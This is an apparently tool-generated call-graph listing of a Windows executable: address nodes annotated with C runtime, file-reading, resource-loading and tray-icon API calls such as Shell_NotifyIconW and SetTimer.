96106->96064 96107->96075 96108->96075 96109->96075 96110->96075 96111->96075 96112->96075 96131 51ec76 messages 96113->96131 96114 5300a3 29 API calls pre_c_initialization 96114->96131 96115 51fef7 96123 51a8c7 22 API calls 96115->96123 96130 51ed9d messages 96115->96130 96117 52fddb 22 API calls 96117->96131 96119 564600 96125 51a8c7 22 API calls 96119->96125 96119->96130 96120 564b0b 96163 58359c 82 API calls __wsopen_s 96120->96163 96121 51a8c7 22 API calls 96121->96131 96123->96130 96125->96130 96127 530242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96127->96131 96128 51fbe3 96128->96130 96132 564bdc 96128->96132 96136 51f3ae messages 96128->96136 96129 51a961 22 API calls 96129->96131 96130->96052 96131->96114 96131->96115 96131->96117 96131->96119 96131->96120 96131->96121 96131->96127 96131->96128 96131->96129 96131->96130 96134 564beb 96131->96134 96135 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96131->96135 96131->96136 96160 5201e0 235 API calls 2 library calls 96131->96160 96161 5206a0 41 API calls messages 96131->96161 96164 58359c 82 API calls __wsopen_s 96132->96164 96165 58359c 82 API calls __wsopen_s 96134->96165 96135->96131 96136->96130 96162 58359c 82 API calls __wsopen_s 96136->96162 96137->96054 96138->96064 96139->96059 96141 51a8db 96140->96141 96143 51a8ea __fread_nolock 96140->96143 96142 52fe0b 22 API calls 96141->96142 96141->96143 96142->96143 96143->96061 96144->96033 96145->96064 96147 51aedc 96146->96147 96151 51aed9 __fread_nolock 96146->96151 96148 52fddb 22 API calls 96147->96148 96149 51aee7 96148->96149 96150 52fe0b 22 API calls 96149->96150 96150->96151 96151->96086 96152->96089 96157 51addd 96153->96157 96154 51adb6 96154->96075 96155 52fddb 22 API calls 96155->96157 96156 51a961 22 API calls 96156->96157 96157->96154 96157->96155 96157->96156 96158 51a8c7 22 API calls 96157->96158 96159 51adcd 22 API calls 96157->96159 96158->96157 96159->96157 96160->96131 96161->96131 96162->96130 96163->96130 96164->96134 96165->96130 96166 512e37 96167 51a961 22 API calls 96166->96167 96168 512e4d 96167->96168 96245 514ae3 96168->96245 96170 512e6b 96259 513a5a 96170->96259 96172 512e7f 96266 519cb3 96172->96266 96177 552cb0 96310 582cf9 96177->96310 96178 512ead 96182 51a8c7 22 API calls 96178->96182 96180 552cc3 96181 552ccf 96180->96181 96336 514f39 96180->96336 96187 514f39 68 API calls 96181->96187 96184 512ec3 96182->96184 96294 516f88 22 API calls 96184->96294 96186 512ecf 96188 519cb3 22 API calls 96186->96188 96189 552ce5 96187->96189 96190 512edc 96188->96190 96342 513084 22 API calls 96189->96342 96295 51a81b 41 API calls 96190->96295 96193 512eec 96195 519cb3 22 API calls 96193->96195 96194 552d02 96343 513084 22 API calls 96194->96343 96197 512f12 96195->96197 96296 51a81b 41 API calls 96197->96296 96198 552d1e 96200 513a5a 24 API calls 96198->96200 96201 552d44 96200->96201 96344 513084 22 API calls 96201->96344 96202 512f21 96204 51a961 22 API calls 96202->96204 96206 512f3f 96204->96206 96205 552d50 96207 51a8c7 22 API calls 96205->96207 96297 513084 22 API calls 96206->96297 96209 552d5e 96207->96209 96345 513084 22 API calls 96209->96345 96210 512f4b 96298 534a28 40 API calls 3 library calls 96210->96298 96213 552d6d 96216 51a8c7 22 API calls 96213->96216 96214 512f59 96214->96189 96215 512f63 96214->96215 96299 534a28 40 API calls 3 library calls 96215->96299 96218 552d83 96216->96218 96346 513084 22 API calls 96218->96346 96219 512f6e 96219->96194 96221 512f78 96219->96221 96300 534a28 40 API calls 3 library calls 96221->96300 96222 552d90 96224 512f83 96224->96198 96225 512f8d 96224->96225 96301 534a28 40 API calls 3 library calls 96225->96301 96227 512f98 96228 512fdc 96227->96228 96302 513084 22 API calls 96227->96302 96228->96213 96229 512fe8 96228->96229 96229->96222 96304 5163eb 22 API calls 96229->96304 96231 512fbf 96233 51a8c7 22 API calls 96231->96233 96235 512fcd 96233->96235 96234 512ff8 96305 516a50 22 API calls 96234->96305 96303 513084 22 API calls 96235->96303 96238 513006 96306 5170b0 23 API calls 96238->96306 96242 513021 96243 513065 96242->96243 96307 516f88 22 API calls 96242->96307 96308 5170b0 23 API calls 96242->96308 96309 513084 22 API calls 96242->96309 96246 514af0 __wsopen_s 96245->96246 96248 514b22 96246->96248 96350 516b57 96246->96350 96258 514b58 96248->96258 96347 514c6d 96248->96347 96250 514c6d 22 API calls 96250->96258 96251 519cb3 22 API calls 96253 514c52 96251->96253 96252 519cb3 22 API calls 96252->96258 96254 51515f 22 API calls 96253->96254 96256 514c5e 96254->96256 96256->96170 96257 514c29 96257->96251 96257->96256 96258->96250 96258->96252 96258->96257 96362 51515f 96258->96362 96373 551f50 96259->96373 96262 519cb3 22 API calls 96263 513a8d 96262->96263 96375 513aa2 96263->96375 96265 513a97 96265->96172 96267 519cc2 _wcslen 96266->96267 96268 52fe0b 22 API calls 96267->96268 96269 519cea __fread_nolock 96268->96269 96270 52fddb 22 API calls 96269->96270 96271 512e8c 96270->96271 96272 514ecb 96271->96272 96395 514e90 LoadLibraryA 96272->96395 96277 514ef6 LoadLibraryExW 96403 514e59 LoadLibraryA 96277->96403 96278 553ccf 96280 514f39 68 API calls 96278->96280 96281 553cd6 96280->96281 96283 514e59 3 API calls 96281->96283 96285 553cde 96283->96285 96425 5150f5 96285->96425 96286 514f20 96286->96285 96287 514f2c 96286->96287 96289 514f39 68 API calls 96287->96289 96291 512ea5 96289->96291 96291->96177 96291->96178 96293 553d05 96294->96186 96295->96193 96296->96202 96297->96210 96298->96214 96299->96219 96300->96224 96301->96227 96302->96231 96303->96228 96304->96234 96305->96238 96306->96242 96307->96242 96308->96242 96309->96242 96311 582d15 96310->96311 96312 51511f 64 API calls 96311->96312 96313 582d29 96312->96313 96696 582e66 96313->96696 96316 5150f5 40 API calls 96317 582d56 96316->96317 96318 5150f5 40 API calls 96317->96318 96319 582d66 96318->96319 96320 5150f5 40 API calls 96319->96320 96321 582d81 96320->96321 96322 5150f5 40 API calls 96321->96322 96323 582d9c 96322->96323 96324 51511f 64 API calls 96323->96324 96325 582db3 96324->96325 96326 53ea0c ___std_exception_copy 21 API calls 96325->96326 96327 582dba 96326->96327 96328 53ea0c ___std_exception_copy 21 API calls 96327->96328 96329 582dc4 96328->96329 96330 5150f5 40 API calls 96329->96330 96331 582dd8 96330->96331 96332 5828fe 27 API calls 96331->96332 96334 582dee 96332->96334 96333 582d3f 96333->96180 96334->96333 96702 5822ce 96334->96702 96337 514f43 96336->96337 96341 514f4a 96336->96341 96338 53e678 67 API calls 96337->96338 96338->96341 96339 514f59 96339->96181 96340 514f6a FreeLibrary 96340->96339 96341->96339 96341->96340 96342->96194 96343->96198 96344->96205 96345->96213 96346->96222 96348 51aec9 22 API calls 96347->96348 96349 514c78 96348->96349 96349->96248 96351 554ba1 96350->96351 96352 516b67 _wcslen 96350->96352 96369 5193b2 96351->96369 96355 516ba2 96352->96355 96356 516b7d 96352->96356 96354 554baa 96354->96354 96358 52fddb 22 API calls 96355->96358 96368 516f34 22 API calls 96356->96368 96360 516bae 96358->96360 96359 516b85 __fread_nolock 96359->96248 96361 52fe0b 22 API calls 96360->96361 96361->96359 96363 51516e 96362->96363 96367 51518f __fread_nolock 96362->96367 96365 52fe0b 22 API calls 96363->96365 96364 52fddb 22 API calls 96366 5151a2 96364->96366 96365->96367 96366->96258 96367->96364 96368->96359 96370 5193c9 __fread_nolock 96369->96370 96371 5193c0 96369->96371 96370->96354 96371->96370 96372 51aec9 22 API calls 96371->96372 96372->96370 96374 513a67 GetModuleFileNameW 96373->96374 96374->96262 96376 551f50 __wsopen_s 96375->96376 96377 513aaf GetFullPathNameW 96376->96377 96378 513ae9 96377->96378 96379 513ace 96377->96379 96389 51a6c3 96378->96389 96380 516b57 22 API calls 96379->96380 96382 513ada 96380->96382 96385 5137a0 96382->96385 96386 5137ae 96385->96386 96387 5193b2 22 API calls 96386->96387 96388 5137c2 96387->96388 96388->96265 96390 51a6d0 96389->96390 96391 51a6dd 96389->96391 96390->96382 96392 52fddb 22 API calls 96391->96392 96393 51a6e7 96392->96393 96394 52fe0b 22 API calls 96393->96394 96394->96390 96396 514ec6 96395->96396 96397 514ea8 GetProcAddress 96395->96397 96400 53e5eb 96396->96400 96398 514eb8 96397->96398 96398->96396 96399 514ebf FreeLibrary 96398->96399 96399->96396 96433 53e52a 96400->96433 96402 514eea 96402->96277 96402->96278 96404 514e8d 96403->96404 96405 514e6e GetProcAddress 96403->96405 96408 514f80 96404->96408 96406 514e7e 96405->96406 96406->96404 96407 514e86 FreeLibrary 96406->96407 96407->96404 96409 52fe0b 22 API calls 96408->96409 96410 514f95 96409->96410 96501 515722 96410->96501 96412 514fa1 __fread_nolock 96413 5150a5 96412->96413 96414 553d1d 96412->96414 96424 514fdc 96412->96424 96504 5142a2 CreateStreamOnHGlobal 96413->96504 96515 58304d 74 API calls 96414->96515 96417 553d22 96419 51511f 64 API calls 96417->96419 96418 5150f5 40 API calls 96418->96424 96420 553d45 96419->96420 96421 5150f5 40 API calls 96420->96421 96423 51506e messages 96421->96423 96423->96286 96424->96417 96424->96418 96424->96423 96510 51511f 96424->96510 96426 515107 96425->96426 96429 553d70 96425->96429 96537 53e8c4 96426->96537 96430 5828fe 96679 58274e 96430->96679 96432 582919 96432->96293 96436 53e536 ___scrt_is_nonwritable_in_current_image 96433->96436 96434 53e544 96458 53f2d9 20 API calls _free 96434->96458 96436->96434 96438 53e574 96436->96438 96437 53e549 96459 5427ec 26 API calls ___std_exception_copy 96437->96459 96440 53e586 96438->96440 96441 53e579 96438->96441 96450 548061 96440->96450 96460 53f2d9 20 API calls _free 96441->96460 96444 53e58f 96446 53e5a2 96444->96446 96447 53e595 96444->96447 96445 53e554 __fread_nolock 96445->96402 96462 53e5d4 LeaveCriticalSection __fread_nolock 96446->96462 96461 53f2d9 20 API calls _free 96447->96461 96451 54806d ___scrt_is_nonwritable_in_current_image 96450->96451 96463 542f5e EnterCriticalSection 96451->96463 96453 54807b 96464 5480fb 96453->96464 96457 5480ac __fread_nolock 96457->96444 96458->96437 96459->96445 96460->96445 96461->96445 96462->96445 96463->96453 96467 54811e 96464->96467 96465 548177 96482 544c7d 96465->96482 96467->96465 96473 548088 96467->96473 96480 53918d EnterCriticalSection 96467->96480 96481 5391a1 LeaveCriticalSection 96467->96481 96471 548189 96471->96473 96495 543405 11 API calls 2 library calls 96471->96495 96477 5480b7 96473->96477 96474 5481a8 96496 53918d EnterCriticalSection 96474->96496 96500 542fa6 LeaveCriticalSection 96477->96500 96479 5480be 96479->96457 96480->96467 96481->96467 96487 544c8a pre_c_initialization 96482->96487 96483 544cca 96498 53f2d9 20 API calls _free 96483->96498 96484 544cb5 RtlAllocateHeap 96485 544cc8 96484->96485 96484->96487 96489 5429c8 96485->96489 96487->96483 96487->96484 96497 534ead 7 API calls 2 library calls 96487->96497 96490 5429fc _free 96489->96490 96491 5429d3 RtlFreeHeap 96489->96491 96490->96471 96491->96490 96492 5429e8 96491->96492 96499 53f2d9 20 API calls _free 96492->96499 96494 5429ee GetLastError 96494->96490 96495->96474 96496->96473 96497->96487 96498->96485 96499->96494 96500->96479 96502 52fddb 22 API calls 96501->96502 96503 515734 96502->96503 96503->96412 96505 5142bc FindResourceExW 96504->96505 96506 5142d9 96504->96506 96505->96506 96507 5535ba LoadResource 96505->96507 96506->96424 96507->96506 96508 5535cf SizeofResource 96507->96508 96508->96506 96509 5535e3 LockResource 96508->96509 96509->96506 96511 51512e 96510->96511 96514 553d90 96510->96514 96516 53ece3 96511->96516 96515->96417 96519 53eaaa 96516->96519 96518 51513c 96518->96424 96523 53eab6 ___scrt_is_nonwritable_in_current_image 96519->96523 96520 53eac2 96532 53f2d9 20 API calls _free 96520->96532 96522 53eae8 96534 53918d EnterCriticalSection 96522->96534 96523->96520 96523->96522 96524 53eac7 96533 5427ec 26 API calls ___std_exception_copy 96524->96533 96527 53eaf4 96535 53ec0a 62 API calls 2 library calls 96527->96535 96529 53eb08 96536 53eb27 LeaveCriticalSection __fread_nolock 96529->96536 96531 53ead2 __fread_nolock 96531->96518 96532->96524 96533->96531 96534->96527 96535->96529 96536->96531 96540 53e8e1 96537->96540 96539 515118 96539->96430 96541 53e8ed ___scrt_is_nonwritable_in_current_image 96540->96541 96542 53e92d 96541->96542 96543 53e925 __fread_nolock 96541->96543 96545 53e900 ___scrt_fastfail 96541->96545 96553 53918d EnterCriticalSection 96542->96553 96543->96539 96567 53f2d9 20 API calls _free 96545->96567 96546 53e937 96554 53e6f8 96546->96554 96549 53e91a 96568 5427ec 26 API calls ___std_exception_copy 96549->96568 96553->96546 96557 53e70a ___scrt_fastfail 96554->96557 96560 53e727 96554->96560 96555 53e717 96642 53f2d9 20 API calls _free 96555->96642 96557->96555 96557->96560 96565 53e76a __fread_nolock 96557->96565 96558 53e71c 96643 5427ec 26 API calls ___std_exception_copy 96558->96643 96569 53e96c LeaveCriticalSection __fread_nolock 96560->96569 96561 53e886 ___scrt_fastfail 96645 53f2d9 20 API calls _free 96561->96645 96565->96560 96565->96561 96570 53d955 96565->96570 96577 548d45 96565->96577 96644 53cf78 26 API calls 4 library calls 96565->96644 96567->96549 96568->96543 96569->96543 96571 53d961 96570->96571 96572 53d976 96570->96572 96646 53f2d9 20 API calls _free 96571->96646 96572->96565 96574 53d966 96647 5427ec 26 API calls ___std_exception_copy 96574->96647 96576 53d971 96576->96565 96578 548d57 96577->96578 96579 548d6f 96577->96579 96657 53f2c6 20 API calls _free 96578->96657 96581 5490d9 96579->96581 96586 548db4 96579->96586 96673 53f2c6 20 API calls _free 96581->96673 96582 548d5c 96658 53f2d9 20 API calls _free 96582->96658 96585 5490de 96674 53f2d9 20 API calls _free 96585->96674 96587 548d64 96586->96587 96589 548dbf 96586->96589 96593 548def 96586->96593 96587->96565 96659 53f2c6 20 API calls _free 96589->96659 96590 548dcc 96675 5427ec 26 API calls ___std_exception_copy 96590->96675 96592 548dc4 96660 53f2d9 20 API calls _free 96592->96660 96596 548e08 96593->96596 96597 548e2e 96593->96597 96598 548e4a 96593->96598 96596->96597 96632 548e15 96596->96632 96661 53f2c6 20 API calls _free 96597->96661 96664 543820 21 API calls 2 library calls 96598->96664 96601 548e33 96662 53f2d9 20 API calls _free 96601->96662 96602 548e61 96605 5429c8 _free 20 API calls 96602->96605 96608 548e6a 96605->96608 96606 548fb3 96609 549029 96606->96609 96613 548fcc GetConsoleMode 96606->96613 96607 548e3a 96663 5427ec 26 API calls ___std_exception_copy 96607->96663 96611 5429c8 _free 20 API calls 96608->96611 96612 54902d ReadFile 96609->96612 96614 548e71 96611->96614 96615 549047 96612->96615 96616 5490a1 GetLastError 96612->96616 96613->96609 96617 548fdd 96613->96617 96618 548e96 96614->96618 96619 548e7b 96614->96619 96615->96616 96622 54901e 96615->96622 96620 549005 96616->96620 96621 5490ae 96616->96621 96617->96612 96623 548fe3 ReadConsoleW 96617->96623 96667 549424 28 API calls __wsopen_s 96618->96667 96665 53f2d9 20 API calls _free 96619->96665 96639 548e45 __fread_nolock 96620->96639 96668 53f2a3 20 API calls 2 library calls 96620->96668 96671 53f2d9 20 API calls _free 96621->96671 96635 549083 96622->96635 96636 54906c 96622->96636 96622->96639 96623->96622 96624 548fff GetLastError 96623->96624 96624->96620 96625 5429c8 _free 20 API calls 96625->96587 96630 548e80 96666 53f2c6 20 API calls _free 96630->96666 96631 5490b3 96672 53f2c6 20 API calls _free 96631->96672 96648 54f89b 96632->96648 96638 54909a 96635->96638 96635->96639 96669 548a61 31 API calls 4 library calls 96636->96669 96670 5488a1 29 API calls __wsopen_s 96638->96670 96639->96625 96641 54909f 96641->96639 96642->96558 96643->96560 96644->96565 96645->96558 96646->96574 96647->96576 96649 54f8b5 96648->96649 96650 54f8a8 96648->96650 96653 54f8c1 96649->96653 96677 53f2d9 20 API calls _free 96649->96677 96676 53f2d9 20 API calls _free 96650->96676 96652 54f8ad 96652->96606 96653->96606 96655 54f8e2 96678 5427ec 26 API calls ___std_exception_copy 96655->96678 96657->96582 96658->96587 96659->96592 96660->96590 96661->96601 96662->96607 96663->96639 96664->96602 96665->96630 96666->96639 96667->96632 96668->96639 96669->96639 96670->96641 96671->96631 96672->96639 96673->96585 96674->96590 96675->96587 96676->96652 96677->96655 96678->96652 96682 53e4e8 96679->96682 96681 58275d 96681->96432 96685 53e469 96682->96685 96684 53e505 96684->96681 96686 53e478 96685->96686 96687 53e48c 96685->96687 96693 53f2d9 20 API calls _free 96686->96693 96692 53e488 __alldvrm 96687->96692 96695 54333f 11 API calls 2 library calls 96687->96695 96689 53e47d 96694 5427ec 26 API calls ___std_exception_copy 96689->96694 96692->96684 96693->96689 96694->96692 96695->96692 96701 582e7a 96696->96701 96697 582d3b 96697->96316 96697->96333 96698 5150f5 40 API calls 96698->96701 96699 5828fe 27 API calls 96699->96701 96700 51511f 64 API calls 96700->96701 96701->96697 96701->96698 96701->96699 96701->96700 96703 5822e7 96702->96703 96704 5822d9 96702->96704 96706 58232c 96703->96706 96707 53e5eb 29 API calls 96703->96707 96717 5822f0 96703->96717 96705 53e5eb 29 API calls 96704->96705 96705->96703 96731 582557 96706->96731 96709 582311 96707->96709 96709->96706 96711 58231a 96709->96711 96710 582370 96712 582374 96710->96712 96713 582395 96710->96713 96714 53e678 67 API calls 96711->96714 96711->96717 96716 582381 96712->96716 96719 53e678 67 API calls 96712->96719 96735 582171 96713->96735 96714->96717 96716->96717 96721 53e678 67 API calls 96716->96721 96717->96333 96718 58239d 96720 5823c3 96718->96720 96722 5823a3 96718->96722 96719->96716 96742 5823f3 96720->96742 96721->96717 96723 5823b0 96722->96723 96725 53e678 67 API calls 96722->96725 96723->96717 96726 53e678 67 API calls 96723->96726 96725->96723 96726->96717 96727 5823de 96727->96717 96730 53e678 67 API calls 96727->96730 96728 5823ca 96728->96727 96750 53e678 96728->96750 96730->96717 96732 58257c 96731->96732 96734 582565 __fread_nolock 96731->96734 96733 53e8c4 __fread_nolock 40 API calls 96732->96733 96733->96734 96734->96710 96736 53ea0c ___std_exception_copy 21 API calls 96735->96736 96737 58217f 96736->96737 96738 53ea0c ___std_exception_copy 21 API calls 96737->96738 96739 582190 96738->96739 96740 53ea0c ___std_exception_copy 21 API calls 96739->96740 96741 58219c 96740->96741 96741->96718 96749 582408 96742->96749 96743 5824c0 96767 582724 96743->96767 96744 5821cc 40 API calls 96744->96749 96746 5824c7 96746->96728 96749->96743 96749->96744 96749->96746 96763 582606 96749->96763 96771 582269 40 API calls 96749->96771 96751 53e684 ___scrt_is_nonwritable_in_current_image 96750->96751 96752 53e695 96751->96752 96753 53e6aa 96751->96753 96845 53f2d9 20 API calls _free 96752->96845 96762 53e6a5 __fread_nolock 96753->96762 96828 53918d EnterCriticalSection 96753->96828 96756 53e69a 96846 5427ec 26 API calls ___std_exception_copy 96756->96846 96757 53e6c6 96829 53e602 96757->96829 96760 53e6d1 96847 53e6ee LeaveCriticalSection __fread_nolock 96760->96847 96762->96727 96765 58261d 96763->96765 96766 582617 96763->96766 96765->96749 96766->96765 96772 5826d7 96766->96772 96768 582742 96767->96768 96769 582731 96767->96769 96768->96746 96770 53dbb3 65 API calls 96769->96770 96770->96768 96771->96749 96773 582714 96772->96773 96774 582703 96772->96774 96773->96766 96776 53dbb3 96774->96776 96777 53dbc1 96776->96777 96782 53dbdd 96776->96782 96778 53dbe3 96777->96778 96779 53dbcd 96777->96779 96777->96782 96785 53d9cc 96778->96785 96788 53f2d9 20 API calls _free 96779->96788 96782->96773 96783 53dbd2 96789 5427ec 26 API calls ___std_exception_copy 96783->96789 96790 53d97b 96785->96790 96787 53d9f0 96787->96782 96788->96783 96789->96782 96791 53d987 ___scrt_is_nonwritable_in_current_image 96790->96791 96798 53918d EnterCriticalSection 96791->96798 96793 53d995 96799 53d9f4 96793->96799 96797 53d9b3 __fread_nolock 96797->96787 96798->96793 96807 5449a1 96799->96807 96805 53d9a2 96806 53d9c0 LeaveCriticalSection __fread_nolock 96805->96806 96806->96797 96808 53d955 __fread_nolock 26 API calls 96807->96808 96809 5449b0 96808->96809 96810 54f89b __fread_nolock 26 API calls 96809->96810 96811 5449b6 96810->96811 96812 543820 _strftime 21 API calls 96811->96812 96815 53da09 96811->96815 96813 544a15 96812->96813 96814 5429c8 _free 20 API calls 96813->96814 96814->96815 96816 53da3a 96815->96816 96819 53da4c 96816->96819 96822 53da24 96816->96822 96817 53da5a 96818 53f2d9 _free 20 API calls 96817->96818 96820 53da5f 96818->96820 96819->96817 96819->96822 96825 53da85 __fread_nolock 96819->96825 96821 5427ec ___std_exception_copy 26 API calls 96820->96821 96821->96822 96827 544a56 62 API calls 96822->96827 96823 53dc0b 62 API calls 96823->96825 96824 53d955 __fread_nolock 26 API calls 96824->96825 96825->96822 96825->96823 96825->96824 96826 5459be __wsopen_s 62 API calls 96825->96826 96826->96825 96827->96805 96828->96757 96830 53e624 96829->96830 96831 53e60f 96829->96831 96836 53e61f 96830->96836 96848 53dc0b 96830->96848 96873 53f2d9 20 API calls _free 96831->96873 96833 53e614 96874 5427ec 26 API calls ___std_exception_copy 96833->96874 96836->96760 96840 53d955 __fread_nolock 26 API calls 96841 53e646 96840->96841 96858 54862f 96841->96858 96844 5429c8 _free 20 API calls 96844->96836 96845->96756 96846->96762 96847->96762 96849 53dc1f 96848->96849 96850 53dc23 96848->96850 96854 544d7a 96849->96854 96850->96849 96851 53d955 __fread_nolock 26 API calls 96850->96851 96852 53dc43 96851->96852 96875 5459be 96852->96875 96855 53e640 96854->96855 96856 544d90 96854->96856 96855->96840 96856->96855 96857 5429c8 _free 20 API calls 96856->96857 96857->96855 96859 548653 96858->96859 96860 54863e 96858->96860 96862 54868e 96859->96862 96866 54867a 96859->96866 96998 53f2c6 20 API calls _free 96860->96998 97000 53f2c6 20 API calls _free 96862->97000 96863 548643 96999 53f2d9 20 API calls _free 96863->96999 96995 548607 96866->96995 96867 548693 97001 53f2d9 20 API calls _free 96867->97001 96870 53e64c 96870->96836 96870->96844 96871 54869b 97002 5427ec 26 API calls ___std_exception_copy 96871->97002 96873->96833 96874->96836 96876 5459ca ___scrt_is_nonwritable_in_current_image 96875->96876 96877 5459d2 96876->96877 96881 5459ea 96876->96881 96954 53f2c6 20 API calls _free 96877->96954 96878 545a88 96959 53f2c6 20 API calls _free 96878->96959 96880 5459d7 96955 53f2d9 20 API calls _free 96880->96955 96881->96878 96884 545a1f 96881->96884 96900 545147 EnterCriticalSection 96884->96900 96885 545a8d 96960 53f2d9 20 API calls _free 96885->96960 96888 545a25 96890 545a56 96888->96890 96891 545a41 96888->96891 96889 545a95 96961 5427ec 26 API calls ___std_exception_copy 96889->96961 96901 545aa9 96890->96901 96956 53f2d9 20 API calls _free 96891->96956 96894 5459df __fread_nolock 96894->96849 96896 545a51 96958 545a80 LeaveCriticalSection __wsopen_s 96896->96958 96897 545a46 96957 53f2c6 20 API calls _free 96897->96957 96900->96888 96902 545ad7 96901->96902 96940 545ad0 96901->96940 96903 545afa 96902->96903 96904 545adb 96902->96904 96909 545b4b 96903->96909 96910 545b2e 96903->96910 96969 53f2c6 20 API calls _free 96904->96969 96907 545cb1 96907->96896 96908 545ae0 96970 53f2d9 20 API calls _free 96908->96970 96913 545b61 96909->96913 96975 549424 28 API calls __wsopen_s 96909->96975 96972 53f2c6 20 API calls _free 96910->96972 96962 54564e 96913->96962 96914 545b33 96973 53f2d9 20 API calls _free 96914->96973 96915 545ae7 96971 5427ec 26 API calls ___std_exception_copy 96915->96971 96921 545b3b 96974 5427ec 26 API calls ___std_exception_copy 96921->96974 96922 545b6f 96927 545b95 96922->96927 96928 545b73 96922->96928 96923 545ba8 96925 545c02 WriteFile 96923->96925 96926 545bbc 96923->96926 96930 545c25 GetLastError 96925->96930 96936 545b8b 96925->96936 96932 545bc4 96926->96932 96933 545bf2 96926->96933 96977 54542e 45 API calls 3 library calls 96927->96977 96929 545c69 96928->96929 96976 5455e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96928->96976 96929->96940 96984 53f2d9 20 API calls _free 96929->96984 96930->96936 96937 545be2 96932->96937 96938 545bc9 96932->96938 96980 5456c4 7 API calls 2 library calls 96933->96980 96936->96929 96936->96940 96945 545c45 96936->96945 96979 545891 8 API calls 2 library calls 96937->96979 96938->96929 96942 545bd2 96938->96942 96939 545be0 96939->96936 96986 530a8c 96940->96986 96978 5457a3 7 API calls 2 library calls 96942->96978 96944 545c8e 96985 53f2c6 20 API calls _free 96944->96985 96948 545c60 96945->96948 96949 545c4c 96945->96949 96983 53f2a3 20 API calls 2 library calls 96948->96983 96981 53f2d9 20 API calls _free 96949->96981 96952 545c51 96982 53f2c6 20 API calls _free 96952->96982 96954->96880 96955->96894 96956->96897 96957->96896 96958->96894 96959->96885 96960->96889 96961->96894 96963 54f89b __fread_nolock 26 API calls 96962->96963 96964 54565e 96963->96964 96965 545663 96964->96965 96993 542d74 38 API calls 3 library calls 96964->96993 96965->96922 96965->96923 96967 545686 96967->96965 96968 5456a4 GetConsoleMode 96967->96968 96968->96965 96969->96908 96970->96915 96971->96940 96972->96914 96973->96921 96974->96940 96975->96913 96976->96936 96977->96936 96978->96939 96979->96939 96980->96939 96981->96952 96982->96940 96983->96940 96984->96944 96985->96940 96987 530a97 IsProcessorFeaturePresent 96986->96987 96988 530a95 96986->96988 96990 530c5d 96987->96990 96988->96907 96994 530c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96990->96994 96992 530d40 96992->96907 96993->96967 96994->96992 97003 548585 96995->97003 96997 54862b 96997->96870 96998->96863 96999->96870 97000->96867 97001->96871 97002->96870 97004 548591 ___scrt_is_nonwritable_in_current_image 97003->97004 97014 545147 EnterCriticalSection 97004->97014 97006 54859f 97007 5485c6 97006->97007 97008 5485d1 97006->97008 97015 5486ae 97007->97015 97030 53f2d9 20 API calls _free 97008->97030 97011 5485cc 97031 5485fb LeaveCriticalSection __wsopen_s 97011->97031 97013 5485ee __fread_nolock 97013->96997 97014->97006 97032 5453c4 97015->97032 97017 5486be 97018 5486c4 97017->97018 97020 5486f6 97017->97020 97022 5453c4 __wsopen_s 26 API calls 97017->97022 97045 545333 21 API calls 3 library calls 97018->97045 97020->97018 97023 5453c4 __wsopen_s 26 API calls 97020->97023 97021 54871c 97024 54873e 97021->97024 97046 53f2a3 20 API calls 2 library calls 97021->97046 97025 5486ed 97022->97025 97026 548702 CloseHandle 97023->97026 97024->97011 97028 5453c4 __wsopen_s 26 API calls 97025->97028 97026->97018 97029 54870e GetLastError 97026->97029 97028->97020 97029->97018 97030->97011 97031->97013 97033 5453d1 97032->97033 97035 5453e6 97032->97035 97047 53f2c6 20 API calls _free 97033->97047 97039 54540b 97035->97039 97049 53f2c6 20 API calls _free 97035->97049 97036 5453d6 97048 53f2d9 20 API calls _free 97036->97048 97039->97017 97040 545416 97050 53f2d9 20 API calls _free 97040->97050 97041 5453de 97041->97017 97043 54541e 97051 5427ec 26 API calls ___std_exception_copy 97043->97051 97045->97021 97046->97024 97047->97036 97048->97041 97049->97040 97050->97043 97051->97041 97052 513156 97055 513170 97052->97055 97056 513187 97055->97056 97057 5131eb 97056->97057 97058 51318c 97056->97058 97099 5131e9 97056->97099 97060 5131f1 97057->97060 97061 552dfb 97057->97061 97062 513265 PostQuitMessage 97058->97062 97063 513199 97058->97063 97059 5131d0 DefWindowProcW 97064 51316a 97059->97064 97065 5131f8 97060->97065 97066 51321d SetTimer RegisterWindowMessageW 97060->97066 97111 5118e2 10 API calls 97061->97111 97062->97064 97068 5131a4 97063->97068 97069 552e7c 97063->97069 97074 513201 KillTimer 97065->97074 97075 552d9c 97065->97075 97066->97064 97070 513246 CreatePopupMenu 97066->97070 97071 552e68 97068->97071 97072 5131ae 97068->97072 97116 57bf30 34 API calls ___scrt_fastfail 97069->97116 97070->97064 97100 57c161 97071->97100 97078 552e4d 97072->97078 97079 5131b9 97072->97079 97107 5130f2 Shell_NotifyIconW ___scrt_fastfail 97074->97107 97081 552dd7 MoveWindow 97075->97081 97082 552da1 97075->97082 97076 552e1c 97112 52e499 42 API calls 97076->97112 97078->97059 97115 570ad7 22 API calls 97078->97115 97085 5131c4 97079->97085 97086 513253 97079->97086 97080 552e8e 97080->97059 97080->97064 97081->97064 97087 552da7 97082->97087 97088 552dc6 SetFocus 97082->97088 97085->97059 97113 5130f2 Shell_NotifyIconW ___scrt_fastfail 97085->97113 97109 51326f 44 API calls ___scrt_fastfail 97086->97109 97087->97085 97091 552db0 97087->97091 97088->97064 97089 513214 97108 513c50 DeleteObject DestroyWindow 97089->97108 97110 5118e2 10 API calls 97091->97110 97094 513263 97094->97064 97097 552e41 97114 513837 49 API calls ___scrt_fastfail 97097->97114 97099->97059 97101 57c276 97100->97101 97102 57c179 ___scrt_fastfail 97100->97102 97101->97064 97117 513923 97102->97117 97104 57c25f KillTimer SetTimer 97104->97101 97105 57c1a0 97105->97104 97106 57c251 Shell_NotifyIconW 97105->97106 97106->97104 97107->97089 97108->97064 97109->97094 97110->97064 97111->97076 97112->97085 97113->97097 97114->97099 97115->97099 97116->97080 97118 513a13 97117->97118 97119 51393f 97117->97119 97118->97105 97139 516270 97119->97139 97122 553393 LoadStringW 97125 5533ad 97122->97125 97123 51395a 97124 516b57 22 API calls 97123->97124 97126 51396f 97124->97126 97129 51a8c7 22 API calls 97125->97129 97133 513994 ___scrt_fastfail 97125->97133 97127 5533c9 97126->97127 97128 51397c 97126->97128 97131 516350 22 API calls 97127->97131 97128->97125 97130 513986 97128->97130 97129->97133 97144 516350 97130->97144 97134 5533d7 97131->97134 97136 5139f9 Shell_NotifyIconW 